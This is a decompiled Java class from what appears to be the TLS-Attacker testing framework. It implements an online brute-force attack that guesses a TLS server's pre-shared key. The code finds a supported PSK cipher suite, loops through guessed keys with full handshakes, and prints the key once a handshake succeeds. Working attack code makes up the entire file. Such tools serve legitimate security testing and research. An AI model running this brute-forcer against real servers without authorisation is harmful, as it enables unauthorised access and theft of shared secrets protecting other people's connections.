/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.bruteforce.GuessProvider;
import de.rub.nds.tlsattacker.attacks.bruteforce.GuessProviderFactory;
import de.rub.nds.tlsattacker.attacks.config.PskBruteForcerAttackServerCommandConfig;
import de.rub.nds.tlsattacker.attacks.impl.Attacker;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.CipherSuite;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import de.rub.nds.tlsattacker.util.ConsoleLogger;
import java.util.concurrent.TimeUnit;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class PskBruteForcerAttackServer
extends Attacker<PskBruteForcerAttackServerCommandConfig> {
    private static final Logger LOGGER = LogManager.getLogger();
    private GuessProvider guessProvider;

    public PskBruteForcerAttackServer(PskBruteForcerAttackServerCommandConfig config, Config baseConfig) {
        super(config, baseConfig);
    }

    @Override
    public void executeAttack() {
        ConsoleLogger.CONSOLE.info("Connecting to the Server to find a PSK ciphersuite he supports...");
        CipherSuite suite = this.getSupportedPskCiphersuite();
        if (suite == null) {
            ConsoleLogger.CONSOLE.info("Stopping attack");
        }
        ConsoleLogger.CONSOLE.info("The server supports " + (Object)((Object)suite) + ". Trying to guess the PSK. This is an online Attack. Depending on the PSK this may take some time...");
        this.guessProvider = GuessProviderFactory.createGuessProvider(((PskBruteForcerAttackServerCommandConfig)this.config).getGuessProviderType(), ((PskBruteForcerAttackServerCommandConfig)this.config).getGuessProviderInputStream());
        boolean result = false;
        int counter = 0;
        long startTime = System.currentTimeMillis();
        while (!result) {
            byte[] guessedPsk = this.guessProvider.getGuess();
            if (guessedPsk == null) {
                ConsoleLogger.CONSOLE.info("Could not find psk - attack stopped");
                break;
            }
            if (guessedPsk.length == 0) continue;
            ++counter;
            if (LOGGER.isDebugEnabled()) {
                LOGGER.debug("Guessing: " + ArrayConverter.bytesToHexString((byte[])guessedPsk));
            }
            if (!(result = this.executeProtocolFlowToServer(suite, guessedPsk))) continue;
            long stopStime = System.currentTimeMillis();
            ConsoleLogger.CONSOLE.info("Found the psk in " + String.format("%d min, %d sec", TimeUnit.MILLISECONDS.toMinutes(stopStime - startTime), TimeUnit.MILLISECONDS.toSeconds(stopStime - startTime) - TimeUnit.MINUTES.toSeconds(TimeUnit.MILLISECONDS.toMinutes(stopStime - startTime))));
            ConsoleLogger.CONSOLE.info("Guessed " + counter + " times");
        }
    }

    @Override
    public Boolean isVulnerable() {
        boolean supportsPsk;
        ConsoleLogger.CONSOLE.info("Connecting to the Server...");
        boolean bl = supportsPsk = this.getSupportedPskCiphersuite() != null;
        if (supportsPsk) {
            ConsoleLogger.CONSOLE.info("Maybe vulnerable - server supports PSK");
            return null;
        }
        ConsoleLogger.CONSOLE.info("Not Vulnerable - server does not support PSK");
        return false;
    }

    private CipherSuite getSupportedPskCiphersuite() {
        Config tlsConfig = this.getTlsConfig();
        String clientIdentity = ((PskBruteForcerAttackServerCommandConfig)this.config).getPskIdentity();
        LOGGER.debug("Client Identity: " + clientIdentity);
        WorkflowTrace trace = new WorkflowConfigurationFactory(tlsConfig).createWorkflowTrace(WorkflowTraceType.HELLO, RunningModeType.CLIENT);
        State state = new State(tlsConfig, trace);
        WorkflowExecutor executor = WorkflowExecutorFactory.createWorkflowExecutor(tlsConfig.getWorkflowExecutorType(), state);
        executor.executeWorkflow();
        if (WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SERVER_HELLO, trace)) {
            return state.getTlsContext().getSelectedCipherSuite();
        }
        ConsoleLogger.CONSOLE.info("Did not receive a ServerHello. The Server does not seem to support any of the tested PSK cipher suites.");
        LOGGER.debug("We tested for the following cipher suites:");
        for (CipherSuite suite : tlsConfig.getDefaultClientSupportedCiphersuites()) {
            LOGGER.debug(suite.name());
        }
        return null;
    }

    private boolean executeProtocolFlowToServer(CipherSuite suite, byte[] pskGuess) {
        Config tlsConfig = this.getTlsConfig();
        tlsConfig.setDefaultClientSupportedCiphersuites(suite);
        tlsConfig.setDefaultSelectedCipherSuite(suite);
        tlsConfig.setDefaultPSKKey(pskGuess);
        WorkflowTrace trace = new WorkflowConfigurationFactory(tlsConfig).createWorkflowTrace(WorkflowTraceType.HANDSHAKE, RunningModeType.CLIENT);
        State state = new State(tlsConfig, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();
        if (state.getWorkflowTrace().executedAsPlanned()) {
            ConsoleLogger.CONSOLE.info("PSK " + ArrayConverter.bytesToHexString((byte[])pskGuess));
            return true;
        }
        return false;
    }
}

